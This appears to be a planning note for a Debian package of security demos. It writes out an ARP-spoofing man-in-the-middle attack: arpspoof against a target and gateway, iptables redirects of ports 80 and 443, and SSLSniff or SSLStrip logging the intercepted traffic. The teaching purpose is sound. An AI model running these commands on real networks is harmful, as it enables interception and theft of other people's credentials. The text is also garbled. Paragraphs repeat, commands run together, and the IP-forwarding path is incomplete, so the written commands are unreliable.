This is intended to be a simple debian package that contains tutorials and demos for showing how common information security/computer security issues work. Intended for standalone functionality.
In addition to the WiFi monitor-mode demos that are already under development, at least one (adapter- and mode-agnostic) arpspoof-based attack should be among our initial set of demos. In addition, it would be good to implement at least one example of using iptables to reroute selected traffic to a local service for exploitation. Each of Moxie's SSLSniff and SSLStrip tools represent both of these methods.
The former could be used to show the dangers of ignoring a browser warning (either as a demo or as a "Cato challenge"). The latter could be used to incentivise the installation of HTTPSEverywhere, to encourage the use of HTTPS bookmarks, to clarify the importance of avoiding insecure Web services, to discourage password reuse, etc..
(ip_forwarding can be disabled with sudo sh -c 'echo 0 > /proc/sys/net/ipv4'; the iptables rules can be flushed with sudo iptables -t nat -F; and the arpspoof and SSLxxxx processes, which are blocking, can be killed with <Ctrl-C>.
In addition to the WiFi monitor-mode demos that are already under development, at least one (adapter- and mode-agnostic) arpspoof-based attack should be among our initial set of demos. In addition, it would be good to implement at least one example of using iptables to reroute selected traffic to a local service for exploitation. Each of Moxie's SSLSniff and SSLStrip tools represent both of these methods.
The former could be used to show the dangers of ignoring a browser warning (either as a demo or as a "Cato challenge"). The latter could be used to incentivise the installation of HTTPSEverywhere, to encourage the use of HTTPS bookmarks, to clarify the importance of avoiding insecure Web services, to discourage password reuse, etc..
Both tools work more or less by way of...
sudo sh -c 'echo 1 > /proc/sys/net/ipv4'sudo arpspoof -t <target_IP> -i <adapter> <gateway_IP>...followed by either...
sudo iptables -t nat -p tcp -A PREROUTING -j REDIRECT --destination-port 443 --to-port <arbitrary_port>SSLSniff -s <arbitrary_port> -c <path_to_self-signed_cert> -w <output_log> -p...or...
sudo iptables -t nat -p tcp -A PREROUTING -j REDIRECT --destination-port 80 --to-port <arbitrary_port>SSLStrip -l <arbitrary_port> -w <output_log> -p...and then by monitoring the
<output_log>.(ip_forwarding can be disabled with
sudo sh -c 'echo 0 > /proc/sys/net/ipv4'; the iptables rules can be flushed withsudo iptables -t nat -F; and the arpspoof and SSLxxxx processes, which are blocking, can be killed with<Ctrl-C>.